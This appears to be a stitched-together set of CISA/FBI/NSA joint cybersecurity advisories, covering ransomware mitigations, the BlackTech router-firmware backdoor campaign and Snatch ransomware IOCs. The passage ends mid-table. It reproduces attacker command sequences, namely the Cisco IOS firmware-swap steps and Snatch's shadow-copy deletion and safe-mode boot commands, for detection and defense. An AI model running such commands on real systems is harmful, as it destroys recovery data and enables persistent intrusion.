  • Maintain offline backups of data, and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they will not be as severe and/or only have irretrievable data [CPG 2.R]. Recommend organizations follow the 3-2-1 backup strategy in which organizations have three copies of data (one copy of production data and two backup copies) on two different media such as disk and tape, with one copy kept off-site for disaster recovery.
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies.
    • Use longer passwords consisting of at least 15 characters [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks, restricting further lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 3-7).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and  FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

REFERENCES

[1] GitHub sysdream | ligolo repository
[2] GitHub jpillora | chisel repository
[3] GitHub BishopFox | sliver repository

September 26, 2023

People’s Republic of China-Linked Cyber Actors Hide in Router Firmware | CISA

Executive Summary

The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind.

BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise.

For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1]

Download the PDF version of this report: PDF, 808 KB

Technical Details

This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs.

Background

Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks.

Observable TTPs

BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include:

  • BendyBear [S0574]
  • Bifrose
  • BTSDoor
  • FakeDead (a.k.a. TSCookie) [S0436]
  • Flagpro [S0696]
  • FrontShell (FakeDead’s downloader module)
  • IconDown
  • PLEAD [S0435]
  • SpiderPig
  • SpiderSpring
  • SpiderStack
  • WaterBear [S0579]

BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which make them appear legitimate and therefore more difficult for security software to detect [T1553.002].

BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2]

Pivoting from international subsidiaries

The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks.

Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002].

Maintaining access via stealthy router backdoors

BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment.

In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router's built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006], however, it is not always necessary.

BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001].

Firmware replacement process

BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH.

Table 1: File types to compromise the router

File Type

Description

Old Legitimate Firmware

The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader.

Modified Firmware

The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router.

Modified Bootloader

The bootloader allows Modified Firmware to continue evading the router's security features for persistence across reboots. In some cases, only modified firmware is used.

BlackTech actors use the Cisco router's CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows:

  1. Download old legitimate firmware.
  2. Set the router to load the old legitimate firmware and reboot with the following command(s):

    config t
    no boot system usbflash0 [filename]
    boot system usbflash0 [filename]
    end
    write
    reload

  3. Download the modified bootloader and modified firmware.
  4. Set the router to load the modified firmware with the following command(s):
    conf t
    no boot system usbflash0 [filename]
    boot system usbflash0 [filename]
    end
    write
  5. Load the modified bootloader (the router reboots automatically) with the following command:
    upgrade rom file bootloader
  6. Enable access by sending a trigger packet that has specific values within the UDP data or TCP Sequence Number field and the Maximum Segment Size (MSS) parameter within the TCP Options field.
Modified bootloader

To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test.

Modified firmware

BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image.

BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging.

To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication.

Detection and Mitigation Techniques

In order to detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH.

The following are the best mitigation practices to defend against this type of malicious activity:

  • Disable outbound connections by applying the "transport output none" configuration command to the virtual teletype (VTY) lines. This command will prevent some copy commands from successfully connecting to external systems.
    Note: An adversary with unauthorized privileged level access to a network device could revert this configuration change.[3]
  • Monitor both inbound and outbound connections from network devices to both external and internal systems. In general, network devices should only be connecting to nearby devices for exchanging routing or network topology information or with administrative systems for time synchronization, logging, authentication, monitoring, etc. If feasible, block unauthorized outbound connections from network devices by applying access lists or rule sets to other nearby network devices. Additionally, place administrative systems in separate virtual local area networks (VLANs) and block all unauthorized traffic from network devices destined for non-administrative VLANs.[4]
  • Limit access to administration services and only permit IP addresses used by network administrators by applying access lists to the VTY lines or specific services. Monitor logs for successful and unsuccessful login attempts with the "login on-failure log" and "login on-success log" configuration commands, or by reviewing centralized Authentication, Authorization, and Accounting (AAA) events.[3]
  • Upgrade devices to ones that have secure boot capabilities with better integrity and authenticity checks for bootloaders and firmware. In particular, highly prioritize replacing all end-of-life and unsupported equipment as soon as possible.[3],[5]
  • When there is a concern that a single password has been compromised, change all passwords and keys.[3]
  • Review logs generated by network devices and monitor for unauthorized reboots, operating system version changes, changes to the configuration, or attempts to update the firmware. Compare against expected configuration changes and patching plans to verify that the changes are authorized.[3]
  • Periodically perform both file and memory verification described in the Network Device Integrity (NDI) Methodology documents to detect unauthorized changes to the software stored and running on network devices.[3]
  • Monitor for changes to firmware. Periodically take snapshots of boot records and firmware and compare against known good images.[3]

Works Cited

[1]    Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF
[2]    Joint CSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF
[3]    NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[4]    NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF 
[5]    Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Disclaimer of endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes.

Trademark recognition

Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc.
FreeBSD is a registered trademark of The FreeBSD Foundation.
Linux is a registered trademark of Linus Torvalds.
MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.
Windows is a registered trademark of Microsoft Corporation.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations.

Contact

NSA Cybersecurity Report Questions and Feedback: [email protected] 
NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: [email protected] 
NSA Media Inquiries / Press Desk: 443-634-0721, [email protected]

U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at [email protected], cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office.

Appendix: MITRE ATT&CK Techniques

See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory.

Table 2: BlackTech ATT&CK Techniques for Enterprise – Resource Development

Technique Title

ID

Use

Obtain Capabilities: Code Signing Certificates

T1588.003

BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses.

Table 3: BlackTech ATT&CK Techniques for Enterprise – Initial Access

Technique Title

ID

Use

Initial Access

TA0001

BlackTech actors gain access to victim networks by exploiting routers.

Trusted Relationship

T1199

BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks.

Table 4: BlackTech ATT&CK Techniques for Enterprise – Persistence

Technique Title

ID

Use

Persistence

TA0003

BlackTech actors gain persistent access to victims’ networks.

Traffic Signaling

T1205

BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router.

Pre-OS Boot: ROMMONkit

T1542.004

BlackTech actors modify router firmware to maintain persistence.

Table 5: BlackTech ATT&CK Techniques for Enterprise – Privilege Escalation

Technique Title

ID

Use

Privilege Escalation

TA0004

BlackTech actors gain elevated privileges on a victim’s network.

Table 6: BlackTech ATT&CK Techniques for Enterprise – Defense Evasion

Technique Title

ID

Use

Defense Evasion

TA0005

BlackTech actors configure their tools to evade detection by security software and EDR.

Modify Registry

T1112

BlackTech actors modify the victim’s registry.

Impair Defenses

T1562

BlackTech actors disable logging on compromised routers to avoid detection and evade defenses.

Impair Defenses: Impair Command History Logging

T1562.003

BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued.

Modify System Image: Patch System Image

T1601.001

BlackTech actors modify router firmware to evade detection.

Table 7: BlackTech ATT&CK Techniques for Enterprise – Discovery

Technique Title

ID

Use

Discovery

TA0007

BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information.

Table 8: BlackTech ATT&CK Techniques for Enterprise – Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

BlackTech actors use RDP to move laterally across a victim’s network.

Remote Services: SSH

T1021.004

BlackTech actors use SSH to move laterally across a victim’s network.

Table 9: BlackTech ATT&CK Techniques for Enterprise – Command and Control

Technique Title

ID

Use

Command and Control

TA0011

BlackTech actors compromise and control a victim’s network infrastructure.

Application Layer Protocol: File Transfer Protocols

T1071.002

BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers.

Proxy

T1090

BlackTech actors use compromised routers to proxy traffic.

September 18, 2023

#StopRansomware: Snatch Ransomware | CISA

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.

Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

AA23-263A.pdf (PDF, 578.71 KB )

For a downloadable copy of IOCs, see:

AA23-263A STIX XML (XML, 79.84 KB )
AA23-263A STIX JSON (JSON, 56.10 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.

Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]

Initial Access and Persistence

Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].

Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].

Data Discovery and Lateral Movement

Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].

Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].

Defense Evasion and Execution

During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].

The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.

Indicators of Compromise (IOCs)

The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.

Email Domains and Addresses

Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:

Table 1: Malicious Email Domains Observed in Use by Snatch Threat Actors

Email Domains

sezname[.]cz

cock[.]li

airmail[.]cc

Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.

Table 2: Legitimate Email Domains Observed in Use by Snatch Threat Actors

Email Domains

tutanota[.]com / tutamail[.]com / tuta[.]io

mail[.]fr

keemail[.]me

protonmail[.]com / proton[.]me

swisscows[.]email

The email addresses listed in Table 3 were reported by recent victims.

Table 3: Snatch’s Email Addresses Reported by Recent Victims

Email Addresses

sn.tchnews.top@protonmail[.]me

funny385@swisscows[.]email

funny385@proton[.]me

russellrspeck@seznam[.]cz

russellrspeck@protonmail[.]com

Mailz13MoraleS@proton[.]me

datasto100@tutanota[.]com

snatch.vip@protonmail[.]com

TOX Messaging IDs

TOX Messaging IDs

CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F

7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418

83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97

0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58

NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond.

Folder Creation

Folder Creation

C:$SysReset

Filenames with Associated SHA-256 Hashes

Filenames

SHA-256

qesbdksdvnotrjnexutx.bat

0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f

eqbglqcngblqnl.bat

1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d

safe.exe

5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd

safe.exe

7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3

safe.exe

28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c

safe.exe

fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066

DefenderControl.exe

a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae

PRETTYOCEANApplicationdrs.bi

6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0

Setup.exe

510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1

WRSA.exe

ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d

ghnhfglwaplf.bat

2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57

nllraq.bat

251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d

ygariiwfenmqteiwcr.bat

3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924

bsfyqgqeauegwyfvtp.bat

6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7

rgibdcghzwpk.bat

84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5

pxyicmajjlqrtgcnhi.bat

a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84

evhgpp.bat

b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40

eqbglqcngblqnl.bat

1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d

qesbdksdvnotrjnexutx.bat

0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f

HOW TO RESTORE YOUR FILES.TXT

 

Filenames with Associated SHA-1 Hashes

Filenames

SHA-1

safe.exe

c8a0060290715f266c89a21480fed08133ea2614

Commands Used by Snatch Threat Actors

Commands

wmiadap.exe /F /T /R

%windir%System32svchost.eve –k WerSvcGroup

conhost.exe 0xFFFFFFFF -ForceV1

vssadmin delete shadows /all /quiet

bcdedit.exe /set {current} safeboot minimal

REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalVSS /VE /T REG_SZ /F /D Service

REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalmXoRpcSsx /VE /T REG_SZ /F /D Service

REG QUERY HKLMSYSTEMCurrentControlSetControl /v SystemStartOptions

%CONHOST% "1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320

"C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe" --flag-switches-begin --flag-switches-end --no-startup-window /prefetch:5

cmd /d /c cmd /d /c cmd /d /c start " " C:Usersgrade1AppDataLocalPRETTYOCEANluvApplicationPRETTYOCEANApplicationidf.bi.

Registry Keys

Registry Keys

HKLMSOFTWAREMicrosoftWindows Media Player NSS3.0ServersD8B548F0-E306-4B2B-BD82-25DAC3208786FriendlyName

HKUS-1-5-21-4270068108-2931534202-3907561125-1001SoftwareMicrosoftWindowsCurrentVersionShell ExtensionsCached{ED50FC29-B964-
48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF

System Log Changes

Source

Message

TerminalServices-RemoteConnectionManager

Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated.

Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall

A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing”

Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall

A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”.

Microsoft-Windows-TaskScheduler%4Operational

Instance of process C:Windowssvchost.exe. (Incorrect file location, should be C:WindowsSystem32svchost.exe)

Mutexes Created

Mutexes Created

Sessions1BaseNamedObjectsgcc-shmem-tdm2-fc_key

Sessions1BaseNamedObjectsgcc-shmem-tdm2-sjlj_once

Sessions1BaseNamedObjectsgcc-shmem-tdm2-use_fc_key

gcc-shmem-tdm2-fc_key

gcc-hmem-tdm2-sjlj_once

gcc-shmem-tdm2-use_fc_key

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.

Table 4: Snatch Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance

Technique Title

ID

Use

Gather Victim Network Information

T1590

Snatch threat actors may gather information about the victim's networks that can be used during targeting.

Table 5: Snatch Threat Actors ATT&CK Techniques for Enterprise – Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Virtual Private Server

T1583.003

